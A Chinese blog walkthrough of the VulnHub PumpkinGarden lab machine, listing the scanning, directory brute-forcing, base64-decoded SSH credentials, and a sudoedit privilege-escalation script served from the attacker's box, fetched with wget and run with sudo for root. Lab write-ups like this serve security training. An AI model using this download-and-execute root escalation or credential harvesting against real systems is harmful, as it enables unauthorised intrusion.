vulnhub之PumpkinGarden的实践

admin 2024年12月23日13:08:32评论4 views字数 857阅读2分51秒阅读模式

本周实践的是vulnhub的PumpkinGarden镜像,

下载地址,https://download.vulnhub.com/missionpumpkin/PumpkinGarden.ova,

用virtualbox导入成功,

console上能直接看到地址,192.168.0.190,

vulnhub之PumpkinGarden的实践

做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.190,

发现靶机开了1515端口的http服务和3535端口的ssh服务,

vulnhub之PumpkinGarden的实践

对http服务进行路径暴破,dirb http://192.168.0.190:1515,

获取到http://192.168.0.190:1515/img ,

vulnhub之PumpkinGarden的实践

浏览器访问,在子目录文件中发现个base64编码,

c2NhcmVjcm93IDogNVFuQCR5,

vulnhub之PumpkinGarden的实践

解码,echo c2NhcmVjcm93IDogNVFuQCR5 | base64 -d,

获取到用户名密码scarecrow : 5Qn@$y,

ssh登录靶机,ssh [email protected] -p3535,

vulnhub之PumpkinGarden的实践

查看到另一个用户名密码,goblin : Y0n$M4sy3D1t,切过去,

vulnhub之PumpkinGarden的实践

又查看到提权方法,

https://www.securityfocus.com/data/vulnerabilities/exploits/38362.sh,

vulnhub之PumpkinGarden的实践

但是已经无法访问到了,直接按别人writeup里的内容做就好了,

kali攻击机上创建脚本,vim sudoedit

#!/bin/sh

echo ALEX-ALEX

su

/bin/su

/usr/bin/su

在kali攻击机上开启http下载服务,python2 -m SimpleHTTPServer,

在靶机上下载脚本,wget http://192.168.0.192:8000/sudoedit,

修改权限,chmod 777 sudoedit,

执行,sudo ./sudoedit,id确认是root,

vulnhub之PumpkinGarden的实践

原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之PumpkinGarden的实践

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月23日13:08:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之PumpkinGarden的实践https://cn-sec.com/archives/3542108.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息